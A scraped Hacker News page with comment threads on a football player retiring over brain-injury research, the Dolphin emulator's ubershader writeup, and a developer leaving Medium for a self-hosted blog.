Edit: updates. Will point out that any summary is going to miss some facts as it's a summary. But I think people might be more likely to read the article if they could decipher the title. I like the Ravens and I assumed this was a cto of a game company yc startup who quit from the title.

ineptech 4 days ago 15 replies      
Has "whether you let your kids play football" joined the long, long list of boolean values that separate members of the Red Tribe from the Blue Tribe?

If not, I think it's inevitable that it will. Someone will try to get their school to close its football program, someone else will complain that the health dangers are exaggerated by the liberal media because football is a red-state passtime, and pretty soon it'll be "Why do you hate America and apple pie" vs "Why do you want children to suffer and die".

Azkar 4 days ago 14 replies      
So what's the big picture here? We've suspected for years that football leads to brain trauma. Does that mean the NFL should shut down? Should they continue to operate as normal?

There have been efforts recently to make the game safer for players, but the amount of concussions and injuries seen every season don't seem to be decreasing.

Can you make the game "more safe" without drastically changing the game? Any game played at this high of a speed, with this strong of players is going to have some inherent danger to it.

Do we just need to make the effects more widely known and understood by the players, maybe treat football like smoking with warnings printed on the outside of helmets? Anything less than that and you run the risk of not making your point.

Should I feel bad as a fan for watching football? Is it any worse than buying clothing made by child labor from a third world country?

tnecniv 4 days ago 1 reply      
I'm amazed he had time to play and do a PhD at MIT. I imagine even in the off season those guys are very busy.
ilamont 4 days ago 1 reply      
He was profiled in the most recent issue of Tech Review. He said his mother has been asking him to retire for a few years, but he still loved the athletic challenge of playing against top players.
zitterbewegung 4 days ago 1 reply      
Has he ever been recorded giving a lecture about the Math that he does? I found a paper of his [1]. Looking at his wikipedia he is specializing in spectral graph theory , numerical linear algebra and machine learning. I think following what his next steps will be might be interesting also. Might setup a scholar Google alert.

[1] http://www.global-sci.org/jcm/openaccess/v33n2/pdf/332-209.p...

kraig911 4 days ago 0 replies      
Well I think the results of the CTE study showed him that though no matter how much he wanted both things, only one of those would be consciously choosable while the latter would all he would have left if he continued.
otoburb 4 days ago 0 replies      
>>In August 2015, he suffered a concussion when he went helmet-to-helmet with another player and was knocked unconscious.

"I think it hurt my ability to think well mathematically," Urschel said. "It took me about three weeks before I was football-ready. It took me a little bit longer before my high-level visualizations ability came back."

Losing a high-level cognitive ability must be terrifying; the flood of relief upon regaining his ability (probably slowly?) after 4+ weeks must have made him deeply question his continuing commitment, and then the CTE study pushed him over the edge.

gburt 4 days ago 0 replies      
This is a strong testament to the value of the research. The researchers may have saved this guy's brain, if not his life.
therajiv 4 days ago 0 replies      
I ran into this guy randomly at MIT once, during the offseason (last February). He was such a chill guy. Hearing this news makes me like him even more - he's not letting one of his passions get in the way of another.
backtoyoujim 4 days ago 2 replies      
Trying to watch NFL reminds me of the moment in "Django Unchained" when we meet diCaprio's character sitting in a chair watching to slaves beat each other to death.

That moment of that movie comes to me every time the TV producers cut to the team owner sitting in their fancy box in their fancy chair paying lots of African American men to beat each other up for our entertainment and profit.

keeptrying 4 days ago 3 replies      
There is a significant bias here in that its 99% of NFL players brains * which have been donated to the NFL *.

But honestly even if you could peek into every NFL players brain, I'm sure the likely incidence after 4-5 years of playing would be orders of magnitude greater than whats found in the general population.

sna1l 4 days ago 3 replies      
For someone so smart, I'm a little surprised it took this CTE study to push him over the edge.

But maybe he wanted more conclusive data before leaving a job which paid him millions. :)

balls187 4 days ago 0 replies      
"NFL Mathematics Expert"

That's pretty amazing. He scored 43/50 on the Wonderlic (highest in 2014).

Ryan Fitzpatrick scored a 49/50, though it was in the older format.

CurtMonash 4 days ago 2 replies      
I abruptly stopped being a football fan last November.

The immediate reason was Bill Belichick staking his own reputation on Donald Trump's assaults on the media, in a close state in a close election. But CTE was making it hard to remain a football fan anyway.

dragontamer 4 days ago 3 replies      
Football may get a lot of study recently, because its one of the most popular sports.

But Basketball injuries can ruin you for life as well. I have a cousin who has severe amnesia after getting knocked out during a Basketball match. Its like years of his life were wiped away after his concussion. He was a straight-A student too, these sorts of things are severely damaging to your student career.

Brain injuries exist in a lot of sports. Football is particularly dangerous but the dangers in other sports (Boxing, MMA, Basketball, Soccer) are severe as well.

jrwiegand 4 days ago 0 replies      
Yeah, it is likely the smartest decision for him. I have watched him play his whole career (Ravens fan). He is good but he would have likely bounced around the league as a backup and got cut in the next few years due to age. With this decision he is starting a career that will be enjoyable, safe and well paying. You cannot beat that. Good luck #64.
matt_s 4 days ago 1 reply      
Something that wasn't pointed out in the article is that the vast majority of cases where a NFL player's family donates the brain to CTE study is where they already were showing some degenerative symptoms.

They can't test for CTE on living people and if someone has it but say dies from a heart attack before ever showing symptoms, they likely aren't donating to the CTE study.

Angostura 4 days ago 0 replies      
>In August 2015, Urschel suffered a concussion when he went helmet-to-helmet with another player and was knocked unconscious.

>"I think it hurt my ability to think well mathematically," Urschel said. "It took me about three weeks before I was football-ready. It took me a little bit longer before my high-level visualizations ability came back."

Dirlewanger 4 days ago 1 reply      
Funnily enough, this story also isn't prominently displayed on their homepage aside from the sidebar in tiny font. Apparently within hours of the NYT study being released, ESPN's reblogging of it disappeared to several page refreshes down their homepage. I can't wait for them to be significantly downsized if not dissolved completely.
usgroup 4 days ago 0 replies      
I admire this sort of decision making. In particular, I admire that he took the risk playing football in the first place but called it at some prerequisite level of damage he was willing to take. I'd imagine that is something he put a hard stop on before embarking on the career: "two concussions max then I'm out whatever".
cwkid 4 days ago 0 replies      
This is notable, because Urschel has previously written a piece explaining why he was willing to play football given the risks (https://www.theplayerstribune.com/why-i-play-football/).
ugh123 4 days ago 0 replies      
Wow, shitty auto-play video without ability to pause. Be warned!
bitL 4 days ago 0 replies      
Smart. Congrats! Find another sport for needed challenge ;-)
HiroshiSan 4 days ago 1 reply      
Ubershaders: A Ridiculous Solution to an Impossible Problem dolphin-emu.org
751 points by voltagex_  2 days ago   87 comments top 26
et2o 1 day ago 2 replies      
What an awesome writeup. I am not even really personally invested in the problem as I don't play older video games, but I loved reading the story. I wish other open source projects would do similar writeups when they reach major accomplishments.

If I just saw "specialized shaders replaced with ubershaders" on a feature update, I probably wouldn't think there was much of a story to it.

AceJohnny2 1 day ago 0 replies      
Is there any higher accolade in the field than having John Carmack say "Dolphin updates are wonderful system engineering articles." ?


quotemstr 1 day ago 1 reply      
This is an amazing article. I _love_ technical problems for which the prevailing consensus moves from "this isn't a problem" to "this problem is impossible to fix" to "the proposal fix could never work" to "doing it right would be too much work" to "the solution was inevitable".
bananaboy 1 day ago 0 replies      
This is really great stuff from the Dolphin team!

We took a similar approach when building de Blob 2 for Wii, X360, and PS3. We defined all our materials in terms of TEV stages. On the Wii that was used to set up the TEV when rendering. For X360 and PS3 we had an ubershader that emulated the TEV stages. This made it much easier for the artists; they built all materials in one tool in terms of what are essentially register combiners. We also allowed them to create more complex materials for X360/PS3 that would override the base material and do things that the Wii didn't actually support.

davidmurdoch 2 days ago 1 reply      
My favorite part: "Despite being around 90% complete, the last 90% still remained to be done"
rrradical 1 day ago 0 replies      
"Over the past few years, we've had users ask many questions about shader stuttering, demand action, declare the emulator useless, and some even cuss developers out over the lack of attention to shader compilation stuttering."

Ugh, it pains me to imagine users that would be anything but appreciative towards these developers, but kudos to the devs for using that abuse as inspiration.

the_mitsuhiko 2 days ago 2 replies      
> macOS Graphics Drivers are Still Terrible

There it is again :(

lordleft 2 days ago 0 replies      
This was a really well written overview of a technical puzzle and it's eventual resolution. Loved the lucidity of the prose!
chris_wot 2 days ago 3 replies      
Dear God, the solution is insane! That is mind-blowing... emulating the whole pipeline?!?!

People who do emulation are, quite simply, the very, very best of us.

My other take away is: just don't bother getting an Nvidia card if you can avoid it.

FRex 1 day ago 1 reply      
Call me old fashioned or stupid (just not nostalgic, the best I ever owned was Pegasus, a hardware clone of a NES/Famicon) but whenever I see these issues with older Sony or Nintendo stuff I a in awe.

Today's consoles seem like repacked PCs with few changes but the older ones seem like actual dedicated gaming hardware, especially PS2 with Emotion Engine and PS1 as disk controller, what the hell (in a good way)?!

Fiahil 1 day ago 1 reply      
I never thought people would be working full time on emulator projects. I guess I really underestimated the amount of work going there.
slaymaker1907 1 day ago 4 replies      
Why not take a profiling approach and cache the configurations rather than the compiled shader? You could then compile them on startup. By caching the configurations, you could then share this data between hosts and don't have to invalidate them as often.
sltkr 1 day ago 0 replies      
Fascinating read!

The final approach of interpreting the shaders initially, while compiling them in the background for greater performance, sounds very similar to what just-in-time compilers do.

If you think about it, the problems they face are also kind of similar: both systems are confronted with unpredictable, dynamic "source code", and both want to achieve both high performance while avoiding the lag introduced by ahead-of-time compilation, so it makes sense that a similar solution approach might work.

bpicolo 1 day ago 0 replies      
The Dolphin project always has amazing writeups for complicated technical problems. Really love these. Amazing work from that whole team
misingnoglic 1 day ago 0 replies      
It always amazes me how dedicated and talented the engineers who work on these projects are, amazing :)
Nican 1 day ago 0 replies      
The dolphin emulator's blog is doing awesome blog posts as usual. Reminds me of how JavaScript compilers[1] also compile several versions of the same function, as the interpreter gains more insight on how the function is used.

[1] https://wingolog.org/archives/2011/07/05/v8-a-tale-of-two-co... (Wow, 2011, time goes by fast)

br1 19 hours ago 0 replies      
Reminds me of https://01.org/fast-ui-draw/blogs/krogovin/2016/fast-ui-draw..., a Canvas implementation from Intel that also uses a uber shader.
ginko 1 day ago 0 replies      
This approach actually seems more straightforward and easier to maintain than the original shader cache system.Of course when dolphin was originally written this wasn't feasible on hardware at that time, but nowadays I'd say shaders of this complexity aren't that unusual.
spondyl 1 day ago 0 replies      
Dolphin always do great writeups and this is no different. Real nice!
nhaehnle 1 day ago 1 reply      
Now refactor everything so that the purpose-built shaders are actually generated from the ubershader simply by hard-coding the various decision points, possibly using preprocessor tricks? Seems like a natural next step that should be able to simplify the emulator a lot...
phkahler 1 day ago 0 replies      
In short, they went from shader translation to emulation (on the GPU) which eliminates the delays of dynamic translation. Fortunately the emulation is fast enough that it works great.
randyrand 1 day ago 2 replies      
does anyone know what the interpreter actually needs to interpret?

what does the code look like?

wellsjohnston 1 day ago 0 replies      
Metroid Prime was so good.
throwaway0to1 1 day ago 1 reply      
All this work and you can buy a used GameCube system for $50 USD. What's the point?
libeclipse 1 day ago 0 replies      
> Blog tags

 3d 4.0 5.0 60FPS Accessory adreno amd Analysis android announcement arm audio bestof bug bugfix Cheats Commemoration D3D D3D9 Datel driver Factor5 Feature Removal Foundation Gamehacks gpu Graphics Hardware HD hle intel Legal Licensing mali mesa Netplay new feature nvidia OGL Patches performance progress report Qt qualcomm release releasecandidate Review shieldtv stereo stereoscopy technical ubershaders ui Unlicensed video vulkan Wii wiimote Wiimote Wind Waker

peterburkimsher 1 day ago 2 replies      
This is incredible work. Predicting, sharing, asynchronous compilation, and reverse-engineering the pipeline are all very creative solutions to a really difficult problem. As I understand, deep learning basically runs graphics cards backwards to generate text from images.

How can we apply these excellent algorithms to machine learning?

How Chrome OS, Termux, YubiKey and Duo Mobile make for great usable security lessonslearned.org
467 points by walterbell  5 days ago   170 comments top 42
serf 5 days ago 4 replies      
So, be inconvenienced in every aspects important to a dev but gain a bit of confidence in your machine (as long as you trust Big-G)?

verified boot seems like the only advantage here. You can buy an ebay business-grade laptop with TPM for 40 bucks USD readily, and they don't require reliance on Google or the requirement that one uses a neutered OS. (yes, yes, it's secure. It's a users' platform. Development on chrome OS at this point is an act of masochism.)

If secure travel is your thing, stash your data on a cloud provider and pull it later after you arrive at your destination. Go whole-hog and travel without an SSD and buy a cheap one at your destination with cash. Sprinkle in some libreboot for more confidence.

It'll still be cheaper than a 200 dollar chromebook, and you probably won't have to deal with some of the worlds' worst chicklet keyboards.

P.S. don't travel with a yubikey that isn't partnered with another. Would be a bummer to lose.

AdmiralAsshat 5 days ago 7 replies      
I'm not sure how much extra "security" you're really getting out of staying strictly within ChromeOS. Yes, Secure Boot is disabled. However, the ChromeOS partition is still encrypted, and you can manually encrypt any of your crouton chroot environments, so someone looking at the thing still wouldn't be able to peek into the contents. If you're asked, "Why is this in Developer Mode?", you can answer, "I'm a developer."

Additionally, once Developer Mode is enabled, you must hit Ctrl+D to move past the warning screen every time. It is incredibly easy to inadvertently hit Enter or Spacebar, and then have the Chromebook wipe itself and restore to factory settings. I've done it inadvertently myself, and have heard multiple reports of a developer's spouse/child accidentally clicking it, too. Unless a Border Patrol agent knew exactly what they were doing, I'd be willing to bet they'd accidentally wipe it as well.

Finally, while I'm aware that disabling Secure Boot in theory opens you up to an Evil Maid attack, what is the likelihood that border patrol/customs would have a malicious OS on hand, and the know-how to flash it? Worst -case scenario, if you suspect they've tampered with the OS, simply hit Spacebar yourself as soon as you get it back, restore Secure Boot, and then start over from scratch!

As an aside, if you are confined to ChromeOS, I highly recommend Caret as an editor. It's a FOSS, Sublime clone chrome app that works swimmingly on Chromebooks.

Sodman 5 days ago 1 reply      
I've been running the Chromebook Pixel 2015 as my primary dev machine since it came out. Unlike the author however, I've opted for the less-secure "dev mode" on the laptop, and do everything in crouton. (Java web / Android, mostly).

It may not be as secure, but it's hella convenient (still use 2FA). ChromeOS boot is < 5 seconds, and I just stay there for web browsing / netflix. Dropping into crouton is another < 5s when I need to do dev work, or play steam games.

Everything important on the laptop is backed up to some cloud service or another, but it's expensive enough that I'd be distraught if I lost it (plus they stopped selling them).

I'd be more worried about somebody straight up stealing the laptop than any other security risks I may be running by running in dev mode.

I love the idea of natively developing in ChromeOS, but at this point it just seems like more hassle and fighting the system than it's worth.

le-mark 5 days ago 1 reply      
This blog post details using a chromebook as a temporary device, such that you can travel with a blank machine, and provision at your destination with the data and apps you may need:

> It's pretty neat to consider the possibility of pre-travel "power washing" (resetting everything clean to factory settings) on an inexpensive Chromebook and later securely restore over the air once at my destination. ... the engineering challenge here was to find something powerful enough to comfortably use exclusively for several days of coding, writing, and presenting, but also cheap enough that should it get lost/stolen/damaged, I wouldn't lose too much sleep. ... I could treat it as a burner and move on.

Edit; I've been using a de-chromed chromebook for over a year as my primary dev machine and really like it. I developed and launched one side project with it. The model I have (Acer C720) is a dual core Centrino, 2GB of ram, and I upgraded the m2 sata to 120GB. For Python/PHP/Ruby, it's great. I would not do Java development on this set up though. Java IDEs eat battery life and I imagine jvm startup time is a burden on this, although I haven't even installed Java to find out.

Edit 2: to clarify, this is not about removing chromeos, but to use chromeos for it's security features. The article goes over using Termux to get a basic development/work environment setup on chromeos. Plus a lot other helpful tips.

I offered my experience de-chroming as an example, I really like the platform. Apologies if that was confusing.

andrepd 4 days ago 1 reply      
So, the solution to the uncertain threat of airlines picking your luggage and stealing your computer or its data is... giving over your data to somebody that it's certain it's spying on you and whose business model is to comb over your data.

How is this not "you won't catch me, I'll just throw myself off a bridge"?

Also, termux has ~600 packages. Debian has 50,000. Besides the basics, you're liable to need packages you just don't have in termux, which makes it a serviceable environment in a pinch, but not one where you want to do your work on.

pilif 5 days ago 3 replies      
> When things get completely borked (which in two weeks of heavy use only happened a couple of times for me)

how are people willing to live with this? I would be furious if I had to lose all my state and (for all intents and purposes) restart my machine multiple times in two weeks.

And if this "borking" happens right before or during a presentation (the author was writing about using this setup for giving talks on), this would be very embarassing for me and extremely annoying for the audience.

A work/presentaion machine has to be rock solid for me. No compromises, no workarounds and most certainly no "completely borked". Just pure solid.

devy 5 days ago 5 replies      
One of the BIGGEST drawbacks using a Chromebook with 11.6 inch screen that nobody here talks about yet, is the grainy and crappy 1366 x 768 screen resolution! I've been a long time Macs guy anything inferior than RetinaDisplay will considerably straining my eyes before I am used to it. Dell XPS 13 included.
fredley 5 days ago 3 replies      
I tried using a Chromebook as a dev machine several years ago - before Android apps. The chroot situation worked well enough, but the dev-mode boot was a deal-breaker.

Back then, if a Chromebook's local storage filled up, it would factory-reset itself. Is this still the case? This is one big thing keeping me from trying this again (which I'm very tempted to do so after reading this article). Investing in setting up a dev environment like this is fun, but only the first time around...

mkohlmyr 5 days ago 1 reply      
I used my CB30 as a dev machine for a little while, both using cloud environments (koding, codeanywhere) and using vscode under crouton.

It is so close to being usable. It is such a user friendly operating system, it just falls short on a few significant fronts.

1. Developer mode should be friendlier to use (no horrible noises on boot, no delayed boot time).

2. It needs support for electron-based/alike apps to run natively in browser windows without crouton. E.g. vscode.

Aissen 5 days ago 2 replies      
Regarding the TOTP app, I generally prefer FreeOTP to Google Authenticator/Duo/Authy, etc. It might not provide push codes, but at least the implementation is Open Source and the binaries come from a trusted source.
VikingCoder 5 days ago 0 replies      
I bought the exact same machine, Samsung Chromebook 3, as soon as I realized I could run Termux on it.

I'm using it to poke at languages I'd normally never have the time to experiment with.

I'm on the train for about an hour every day, and I wouldn't feel comfortable with a "real" laptop - too likely to be stolen. But for $169? Not such a big loss.

I'm also really excited about how rock-solid this thing is, as a way to hand a kid a computer that can really teach them programming.

g00gler 5 days ago 1 reply      
Don't do it!

I got a Lenovo 14" IdeaPad N42-20 and desktop to replace my 256gb MacBook Pro.

It turned out to be a bad idea, mostly because the screen is terrible. It's the same resolution as the Samsung 3 mentioned in the article.

It also seems so small compared to a 15". Side-by-side windows isn't very nice, either.

I find myself working less because I don't feel like sitting at my desk or using the Chromebook.

andmarios 4 days ago 1 reply      
As a side point about Termux, Android 7 finally stopped hijacking the control+space combination, so you can use emacs efficiently.

Termux is really useful, giving you an almost complete linux environment in Android phones and tablets. You can install it via Google Play, no need for root or any modification to your device. Add an external keyboard and you can work on the go.

atopuzov 5 days ago 2 replies      
I love my C201, also not very expensive. I opted for the 4Gb version. My first setup was chromeos + crouton then I moved to linux on a sd card. I noticed I never boot into chromeos anymore so I got rid of it.
chx 5 days ago 1 reply      
In March, we have seen reports of Android Studio possibly coming to Chrome OS. Android Studio would mean IntelliJ IDEA and the entire family of IntelliJ IDEs. That would make this an even better idea.
qb45 4 days ago 1 reply      
Nearly every how-to and blog post I've found on "Chromebooks for developers" essentially starts with either: "Boot into Developer Mode" or "Install Debian/Ubuntu as the main OS". I'll just say it: This is bad advice. It would be akin to recommending that friends jailbreak their shiny new iPhone. You're obviously free to do as you wish with your own gear, but recognize that at Step 1, you'll have lost most of the core security features of Chromebook

Well, it's possible to temporarily unlock firmware write protection and replace Google key with your own and run self-signed kernels and arbitrary distribution securely. But indeed, I haven't heard of anyone actually going through the effort to do so.

cjsuk 5 days ago 1 reply      
Yubikeys tend to wear out your USB ports after a bit I found, at least on my X201 and the X61 that preceded it.
albertgoeswoof 4 days ago 2 replies      
What's the alternative solution for a cloud/remote based factory wipe, travel and restore? Is there anything on Linux that offers the same quality of user experience without being hampered by chromeOS and dealing with Google/a 3rd party?
talkingtab 5 days ago 2 replies      
I have a potential application for a U2F keys and I'm wondering why you recommend the $18 Yubikey on Amazon versus the $10 one that is also FIDO certified. Is there a difference in the function or some other important difference?
bgrohman 4 days ago 0 replies      
"As far as Debian/Ubuntu (and crouton), that's fine as far as it goes, but then you don't end up with a Chromebook, just a cheap mini-notebook with flaky drivers."

Hmm, I'm not sure about that. I went the Crouton route on my $169 Chromebook, and now I have both ChromeOS and Ubuntu. Plus I can switch between them quickly. And if I understand Crouton, the chroot is actually using the same kernel and drivers as ChromeOS. I haven't had any driver issues. And it's easy to set up encryption for your chroot. I think it's a good solution.

kasey_junk 5 days ago 1 reply      
Does chromeOS allow you to remote wipe the box? That seems like that would be another advantage to this in the case of theft (note: definitely not in the case of the box being confiscated by a lawful authority).
korzun 5 days ago 1 reply      
I have been using the YubiKey for over a year now, and the novelty wore off.

I lost my key a couple of weeks ago and was surprised how easy it was to get back into my accounts with just my phone. There is no point in using something like that if providers allow you to failover to more conventional authentication methods without any hassle; the keys are useless. They are not going to add manual verification for a couple of people who lost their YubiKey.

YubiKey is useful for instances when you want to grant somebody access to something with just a key. I don't see it going beyond that anytime soon.

geogriffin 4 days ago 0 replies      
The chromeos security model praised in this article seems quite too conservative for devs to me, considering the inconvenience trade-offs:

- persistent state is discouraged, but not disallowed. in fact, when the browser is exploited, any/all internal state necessarily must be be accessable and modifiable. i'm taking an educated guess that persistent browser internal state is less guarded against exploitation than external inputs.

- once pwned, most of your important data can probably be captured and accounts taken over before you ever decide to reboot. it's a PITA to have to reboot before accessing anything sensitive; no one should have to think/remember to do that. (maybe if chromeos were serious about preventing persistent threats, they'd force a reboot every night?)

- yes, it's defense-in-depth, but security is a game of trade-offs, where convenience often trumps technical security mechanisms in terms of increasing security overall.

I enable dev mode, but I appreciate the "stateless" sentiment in terms of encouraging data backup. i think I end up backing up my data (git push, etc.) more often than I would on a non-chromeos laptop, because it "feels" like more a necessity; especially after my 2 yr-old son hit the spacebar during that god-awful dev-mode bootup warning screen, and proceeded to factory-reset my chromebook.

cosatelo 4 days ago 0 replies      
Chrome OS always has me torn. Its a beautiful well designed OS with a great concept behind it, however, its obviously non-usable from a privacy standpoint.
grondilu 4 days ago 0 replies      
I used to own a chromebook and I loved it... until it failed.

I had computers that failed before, and usually I could manage to repair them somehow, most often by using a linux liveUSB, but with this chromebook, I've tried many things but I could not do anything. No access to BIOS, not bootable USB, nothing. Complete black box.

So I'm not sure I'll buy an other chromebook anytime soon.

free_everybody 4 days ago 1 reply      
Great article! Here's a thought.

Why not get a used MacBook Air off Ebay for ~$400? Top notch OS, great support, sturdy design, great battery life...

rkeene2 4 days ago 0 replies      
For all of those of you using DOD CACs or USG PIVs (NIST SP 800-73) smartcards there is also CACKey[0] for ChromeOS, of which I am the author.

I worked with Google to port it to ChromeOS when ChromeOS grew certificate provider support.

[0] https://cackey.rkeene.org/

devy 5 days ago 0 replies      
Also, it feels like this Samsung Chromebook 3 is just tiny bit (I am sure it isn't but it feels that way) of upgrade from the famous Dell mini 9[1] from almost a decade ago.

It was super hackable and most people bought it installed hackintosh on it and with a near perfect hardware compatibility with OS X Snow Leopard. A few friends of mine went to Africa for a few months with Dell Mini 9 and were able to freelance their with a fully functional yet super affordable hackintosh Mac. I wish Dell can have another of those netbook lines with compatible hardwares.

[1] https://en.wikipedia.org/wiki/Dell_Inspiron_Mini_Series#9_Se...

JepZ 5 days ago 1 reply      
While I like the idea and the listed apps are just awesome (didn't know about termux, wow), the whole setup depends too much on google services for my taste :-/
limeblack 4 days ago 0 replies      
I have tried using Chrome OS as my main device and I'm basically going to use this post to rant a little. Why does Chrome OS have to use basically a dock like Macs.

I would love and probably use Chrome OS as main device if it looked like this: https://i.stack.imgur.com/9MCqo.png

m-j-fox 5 days ago 1 reply      
Cool. Question: what are your editor options? Any gui-based emacs or atom? If not, do you at-least have text-based emacs in termux?
ufmace 3 days ago 0 replies      
Anyone know why the author seems to be setting up to SSH into Termux? It looks like Termux itself has a perfectly good console, what's the deal with trying to SSH into it from a local client?
omnifischer 5 days ago 0 replies      
Wondering if Google would themselves launch such a workspace. https://www.youtube.com/watch?v=mfLc4U8pnPkThe idea is to have a vnc/remote-desktop style machine on AWS. Just need only a client (secure chromeOS)
jhoechtl 5 days ago 1 reply      
This certainly makes a great dev environment for golang as for development golang has very reasonable requirements.
tkubacki 5 days ago 0 replies      
My current view is that best what average fullstack dev can do is still to buy beefy desktop with linux/nvidia + windows on virtualbox/vmware (for Windows stuff). Additional cheap Chromebook is nice but eg. IntelliJ is to heavy for it.
noja 5 days ago 1 reply      
What does this achieve? How does this stop anyone compelling you to do your fancy setup?
math0ne 4 days ago 0 replies      
Some cool idea's at play here but termux is so limiting I would have a hard time getting any real work done.
digi_owl 5 days ago 0 replies      
I can't help but wonder if _sec has jumped the shark...
alexnewman 4 days ago 1 reply      
It would be perfect..... But no copy and paste in termux
homakov 5 days ago 0 replies      
Usable? Scanning codes and plastic sticks? Not really
tostitos1979 5 days ago 2 replies      
I'm a bit confused (did skim article only). Is this running ChromeOS or Linux? Can I get steam games like stardew valley to run on it?
kaputsmack 5 days ago 0 replies      
As long as you don't mind Google spying on everything you do.
Why I left Medium and moved back to my own domain arslan.io
472 points by ingve  2 days ago   240 comments top 37
tyingq 1 day ago 8 replies      
"Writing comments to Medium posts feels awkward because each comment is treated as a blog post."

This is also awkward from the reader point of view. Trying to follow a comment chain on medium is frustrating as it only shows the first level, diving in switches pages, and often, a need to press a second "load all comments" button. Then the back button to wind your way back up.

Is there some sound reasoning for why it was set up this way? Some benefit I'm not seeing?

JoshMnem 1 day ago 27 replies      
I don't understand why people write programming blogs on Medium. I think that managing a live website with its own server (rather than only working on other people's projects) is a very important skill.

If you don't want to manage WordPress, try a static site generator like Metalsmith: https://github.com/segmentio/metalsmith

Deploy on Digital Ocean or Linode for $5/month. Free hosting options include Github Pages and Netlify.

pmontra 1 day ago 1 reply      
About the dickbars:

1) I uBlock them on my phone and tablet. Unfortunately there are plenty of random sites on Medium with their own domain. I don't follow any of them and get there from HN or similar sites. Blocking all of them doesn't make sense because I'll probably never get back to that domain. I agree with the author, the button in the middle of the page really sucks.

2) On desktop, the button and the dickbar never show because I'm running with NoScript and they are a JavaScript thing :-)

The author misses another inconvenient feature of Medium, the login. It's either by oAuth (I don't remember which providers) or by email. That means they send me an email with a link to click to login. In theory it's ok, because obviously email is safer and more convenient than a password stored in a password manager (/sarcasm). The first time I used it the mail didn't arrive until the day after, so I've been primed against it. Probably almost everybody just login with Facebook or something so, quoting the author, "Im not a part of his [Ev Williams] vision".

Mikho 1 day ago 2 replies      
Switched long time ago to Blogger--free to use your domain, change template design as you like as much as you like, connect external widgets like Disqus (my blog to check how Blogger may look: http://blog.babich.me/).

Also, a huge thing is integration with Google Photos and Google Drive. You may insert in a post photos from your Google Photo right by selecting them inside an image addition menu--no need in hustling with links, just look through Google Photos inside Blogger. BTW, it's possible to see photos uploaded via Blogger in Google Photos folder inside Google Drive (Google Photos app itself does not show photos uploaded via Blogger).

You also may connect FeedBurner (Google company) in Blogger settings and collect subscription emails and also automatically send emails to subscribers via FeedBurner when a new post is published. BTW, every tag used for tagging posts in Blogger becomes dedicated RSS feed. So, if you write about different topics (e.g. coding and travel), it's easy to set up for people to follow RSS or subscribe via email only to a topic they are interested in and not everything you write.

And it's all free!

Medium feels like long-form Twitter with all these replies treated as posts. This is a terrible experience. Especially when you follow RSS feed of somebody on Medium and comments & replies are delivered and treated in the feed the same way as posts. I guess it's due to the fact that Ev was also Twitter founder and has only one construct in his head as to posts and replies.

cupcakestand 1 day ago 4 replies      
To the point criticism of Medium, very detailed and the OP is picking the right issues of Medium.

While Medium looks so beautiful and clean at first glance it really disappoints when you use it on a daily base both as a creator and as a user. Everytime I use Medium, I am surprised that Medium is successful. Its appearance feels definitely premium and significantly of higher value than any other blog system but the usability is a nightmare.

So we are back to square one. Which blog system should we use? SSG on Github Pages?

shinzui 1 day ago 1 reply      
The best part of reading technical content is the discussion in the comments Medium makes that impossible.
Entangled 1 day ago 1 reply      
Medium is a blog platform and a news aggregator. I use it mostly for consuming news by using tags of interest. Good luck with that writing your own blog on your own server. Oh, and the daily newsletter is a delightful joy.

Discoverability is key to the success of Medium.





Or by topic




francis-io 1 day ago 2 replies      
Using something like Jekyll to create a static blog lets you put it on AWS S3. For all but the highest traffic sites the bandwidth cost is trivial and you totally remove all the issues with uptime and securing a server.
illuminea 6 hours ago 0 replies      
From a branding and long-term point of view, it's really important to "own" your content by hosting it on your own domain and even server space. The advantage of a platform like Medium is that it can increase the reach of your content, but it's too risky to go all in with them since who knows how long they'll be around, or what limitations they might add down the line.

But there's a way to have your cake and eat it too: you can publish first on your self-hosted WordPress site, and then republish automatically on Medium with a canonical tag pointing back to your WordPress site. This means you get the SEO and control benefits of WP, and the reach benefits of Medium.

I wrote a guide on how to make this magic happen: https://illuminea.com/ultimate-guide-to-wordpress-medium/. Of course this post is also reposted on Medium with the canonical tag :) https://medium.com/@miriamschwab/6425c2d5e5c4

edem 1 day ago 0 replies      
The OP forgot to mention the worst (IMHO) problem: Medium does not support multi-language content (more here: https://medium.com/@oleksiy/multilingual-content-management-...). If I write posts in English or Hungarian it is okay. But when I start to write in both my readers will see unreadable gibberish when they come to my page and half of the content will be noise for them and it can't be helped.

That's why I do it the other way around. I have my own domain and page which runs on a custom Jekyll / GitHub Pages setup and I import stories to Medium from my page.

This way I can keep using medium and get more readers for free but Medium will display the "Originally posted at ..." line at the bottom. Win-win! You should try this out and use Medium for what it is useful for.

alanh 21 hours ago 0 replies      
A commentator on Arslan's post mentions Mediums foolproof wysiwyg editor. This surprised me. I find their WYSIWYG editor to be incredibly frustrating, counter-intuitive, limiting, and obnoxious.

Allow me to belabor only the last point.

Imagine typing the following sentence (Im using pipe | to show the cursor):

 Clifford is a big dog.
But it's missing something, so you move your insertion point:

 Clifford is a big| dog.
and you type <space>red. In any sane editor, the result will be exactly what you typed:

 Clifford is a big red| dog.
But on Medium, the result is:

 Clifford is a big red|dog.
Clifford is a big reddog? Ffffff. This happened because when you typed the first space after big, the result was not the insertion of a space but in fact the same as if you had hit the "right arrow" key:

 Clifford is a big |dog.
Not cool. I have a strong habit of inserting words with the surrounding spaces already inserted. How dare Medium forbid me to type the way I want?

I know that Medium does this because they are on a crusade to kill the usage of two spaces after sentence. That doesnt excuse insane frustration of the editing process. No wonder most Medium posts don't look like they have ever experienced the most cursory proofreading!

dhruvkar 1 day ago 0 replies      
I don't think this is an either/or situation.

Medium's value is in exposing new, (arguably) high-quality content to its readers.

Every so often, when you write an extra high-quality article, post it on medium as well, with a way for the reader to subscribe. It'll expose new readers to your writing and you still keep your content on your own platform.

amelius 1 day ago 0 replies      
This is good. Medium is, in a sense, the anti-internet. It centralizes where no centralization is needed.
linopolus 1 day ago 1 reply      
I never understood how writers of any kind would let Medium (or Tumblr, or ...) rip all control off their hands.
sixQuarks 1 day ago 1 reply      
Moral of the story: Try to never rely on another company's platform for your business. It's hard enough creating a successful business, but to add a layer of risk on top of that is not smart.
s3nnyy 1 day ago 4 replies      
I feel one of the main reasons Medium is so successful is that they cracked discoverability and rank high on Google for any topic (sort of like Wikipedia). Hence, I am hesitant to move away from it although I really want to build a sustainable, long-term business on my own domain.

Any ideas on this?

TheAceOfHearts 1 day ago 0 replies      
Personally, I never write comments on blog posts, but I participate in communities like Hacker News and a couple random subreddits.

